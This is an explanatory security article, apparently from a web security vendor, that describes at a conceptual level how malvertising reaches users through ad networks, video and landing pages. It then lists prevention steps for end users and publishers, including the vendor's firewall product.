What You Will Learn
- 1 What is malvertising
- 2 Malvertising vs. Ad malware
- 3 How malvertisements affect web users
- 4 How malvertisements affect publishers
- 5 Examples: How malware is inserted into ads
- 6 Prevention and mitigation of malvertising
What is malvertising
Malvertising is an attack in which perpetrators inject malicious code into legitimate online advertising networks. The code typically redirects users to malicious websites.
The attack allows perpetrators to target users on highly reputable websites, e.g., The New York Times Online, The London Stock Exchange, Spotify and The Atlantic, all of which have been exposed to malvertising.
The online advertising ecosystem is a complex network that involves publisher sites, ad exchanges, ad servers, retargeting networks and content delivery networks (CDNs). Multiple redirections between different servers occur after a user clicks on an ad. Attackers exploit this complexity to place malicious content in places that publishers and ad networks would least expect.
See how Web Application Firewall can help you with malvertising attacks.
Malvertising vs. Ad malware
Malvertising is typically confused with ad malware or adware—another form of malware affecting online advertisements.
Adware is a program running on a user’s computer. It’s usually packaged with other, legitimate software, or is installed without the user’s knowledge. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.
Differences between malvertising and ad malware include:
- Malvertising involves malicious code which is initially deployed on a publisher’s web page. Adware, however, is only used to target individual users.
- Malvertising only affects users viewing an infected webpage. Adware, once installed, operates continuously on a user’s computer.
How malvertisements affect web users
Malvertising might perform the following attacks on users viewing the malvertisement without clicking it:
- A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.
- Forced redirect of the browser to a malicious site.
Malvertising can do the following when users actually click a malicious ad:
- Execute code that installs malware or adware on the user’s computer
- Redirect the user to a malicious website, instead of the target suggested by the ad’s content
- Redirect the user to a malicious website very similar to a real site, which is a operated by the attacker—a phishing attack
How malvertisements affect publishers
The threat to publishers is damaged reputation, loss of traffic and revenues, and legal liability to damages caused to users visiting their sites.
While publishers are aware of the problem, they find it difficult to test for or block malicious ads. Ad networks serve ads from millions of advertisers, and display ads dynamically according to real-time bidding, making it very difficult to test all the ads that are actually shown to users.
Examples: How malware is inserted into ads
Attackers use several delivery mechanisms to insert malicious code into ads:
- Malware in ad calls — when a website displays a page that contains an ad, the ad exchange pushes ads to the user via many third parties. One of these third party servers may be compromised by an attacker, who can add malicious code to the ad payload.
- Malware injected post-click — when the user clicks on an ad, they are typically redirected between several URLs, ending with the ad landing page. If an attacker compromises any of the URLs along this delivery path, they can execute malicious code.
- Malware within a pixel — pixels are code embedded in an ad call or landing page, which send data to a server for tracking purposes. A legitimate pixel only sends data. If an attacker intercepts a pixel’s delivery path, it can send a response, containing malicious code, to the user’s browser.
- Malware within video — video players do not protect against malware. For example, a standard video format called VAST contains pixels from third parties, which could contain malicious code. Videos can infect users by displaying a malicious URL at the end of the video.
- Malware within Flash video — videos based on Flash can inject an Iframe into the page, which downloads malware, even without having the user click on the video. Flash files might also load a pre-roll banner (a static image that the user can view while the file is loading). Attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.
- Malware on a landing page — even on legitimate landing pages served by reputable websites, there may be clickable elements that execute malicious code. This type of malware is particularly dangerous because users click an ad, land on a real, legitimate landing page, but are infected by a malicious on-page element.
Prevention and mitigation of malvertising
Malvertising is an attack which is difficult to detect and mitigate, and requires action by end users and publishers alike.
How can end-users help mitigate malvertising?
- Antivirus software can protect against some drive-by downloads or malicious code executed by malvertising.
- Ad blockers offer good protection against malvertising, because they block all ads, together with their malicious elements.
- Avoiding the use of Flash and Java can protect users from many vulnerabilities that are commonly exploited by malvertising.
- Updating browsers and plugins can prevent many malvertising attacks, in particular those which operate before the user clicks the ad.
How can publishers help mitigate malvertising
- Carefully vet ad networks and inquire about ad delivery paths and security practices.
- Scan ad creative intended for display to discover malware or unwanted code.
- Imperva’s Web Application Firewall (WAF) can help protect against some malvertising threats, by using signature, behavioral and reputation analysis to block malicious code execution or requests arriving from non-trusted sources, along the ad delivery chain.